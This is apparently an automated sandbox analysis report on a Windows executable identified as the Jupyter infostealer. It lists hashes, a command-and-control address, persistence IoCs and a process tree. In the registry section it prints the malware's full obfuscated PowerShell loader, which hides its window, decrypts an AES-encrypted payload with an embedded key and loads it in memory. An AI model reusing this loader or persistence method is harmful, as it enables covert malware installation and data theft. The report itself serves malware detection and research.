Analysis
Max time kernel: 307s
Max time network: 311s
Platform: windows10_x64
Resource: win10-20220414-en
Submitted: 13-06-2022 00:01
Static task: static1
General
Target: 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe
Size: 209.7MB
MD5: b565d27f58b8510377a192dd5a920033
SHA1: 5db24c39dffeed0ca8b302892c850f13fb981ca5
SHA256: 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff
SHA512: 9494bdfea2f3c3a97ff0407097aff1e7c602811a2b4929ea10d0229fa5e3371fffd80a9876077ab88841e3be125b1c5ebd26c41ad570a6ea50b4c4e4883a9231
Malware Config
Extracted family: jupyter
C2 URL: http://37.120.247.120
Signatures
- suricata: ET MALWARE Jupyter Stealer CnC Checkin
- Blocklisted process makes network request (1 IoC)
  flow  pid   process
  7     1016  powershell.exe
- Drops startup file (1 IoC)
  description   ioc                                                                                                   process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AAkseLakVWShCAFBIqeAz.lnk  powershell.exe
- Program crash (1 IoC)
  pid  pid_target  process       target process
  204  3728        WerFault.exe  1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe
- Modifies registry class (7 IoCs), all by process powershell.exe
  Key created      \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil
  Set value (str)  \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil\ = "jplfkwrqxarlkfumjaublhevlrnzqaj"
  Key created      \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command
  Key created      \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj
  Key created      \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell
  Key created      \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open
  Set value (str)  \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SuzlSBEybt+4l4GorDHHnbdEjW5soZLDzFJs4SVeMJ0=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\SuMZpQaKehWXVEkKQuHyLIZz\\ybWylzucNKVPS.rhyCuOqCZmgcLvgvIl'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[F26y7_MVUpgqQtmoaaDj.RJt6RD8GBp9hWlC5Gbu11nR9257QVV1qfUfdMGc0QJhbcaHbl95wlIt0RvEZQXgar4zx]::UupaQTjrkgVL7jhlnNjwwOfoiDFmEk6eD5fN96jMuScriboS9_bVDY8MwON3Lmr_VqfUsde9ih0S5aB1amydC9k();\""
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid   process
  1016  powershell.exe
  1016  powershell.exe
  1016  powershell.exe
  1016  powershell.exe
  1016  powershell.exe
  1016  powershell.exe
  3984  powershell.exe
  3984  powershell.exe
  3984  powershell.exe
  1016  powershell.exe
  1016  powershell.exe
  1016  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  1016  powershell.exe
  Token: SeDebugPrivilege  3984  powershell.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  description                       pid   process                                                               target process
  PID 3728 wrote to memory of 1016  3728  1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe  powershell.exe
  PID 3728 wrote to memory of 1016  3728  1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe  powershell.exe
  PID 1016 wrote to memory of 3776  1016  powershell.exe                                                        csc.exe
  PID 1016 wrote to memory of 3776  1016  powershell.exe                                                        csc.exe
  PID 3776 wrote to memory of 160   3776  csc.exe                                                               cvtres.exe
  PID 3776 wrote to memory of 160   3776  csc.exe                                                               cvtres.exe
  PID 3728 wrote to memory of 3984  3728  1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe  powershell.exe
  PID 3728 wrote to memory of 3984  3728  1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe  powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe (PID 3728)
  command line: "C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe"
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1016)
    command line: "powershell"
    signatures: Blocklisted process makes network request; Drops startup file; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 3776)
      command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline"
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 160)
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp" "c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP"
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3984)
    command line: "powershell"
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\WerFault.exe (PID 204)
    command line: C:\Windows\system32\WerFault.exe -u -p 3728 -s 936
    signatures: Program crash
Downloads